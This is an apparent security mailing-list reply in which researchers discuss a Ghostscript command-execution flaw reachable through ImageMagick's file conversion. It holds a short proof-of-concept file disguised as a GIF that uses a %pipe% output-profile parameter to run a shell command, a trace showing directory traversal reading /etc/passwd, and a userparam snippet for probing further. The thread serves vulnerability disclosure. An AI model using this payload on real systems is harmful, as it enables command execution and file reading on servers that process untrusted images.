Re: ImageMagick identify "d:" hangs

[Tavis Ormandy <taviso () google com>]

On Fri, Sep 30, 2016 at 2:11 PM, Florian Weimer <fw () deneb enyo de> wrote:
> * Tavis Ormandy:
> > $ cat test.gif
> > currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)
> > .putdeviceparams
> > quit
> > $ convert test.gif png:test.png
> >
> > (Note: I don't know why it doesn't work on earlier versions, maybe
> > it's possible to make it work, or some other param will work)
>
> It still tries to open a file in earlier versions, with directory
> traversal:
>
> [pid 29607] open("/usr/share/ghostscript/9.06/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 5
>
> The %pipe%-based execution was introduced as a side effect of:

Thanks Florian! I took a look where that directory comes from, I think
it pulls it from a userparam, like:

<< (ICCProfilesDir) (whatever) >> .setuserparams

That probably needs to be fixed. I wonder if there's a way to get that
directory to populate back into the PermitFileReading array?

Tavis.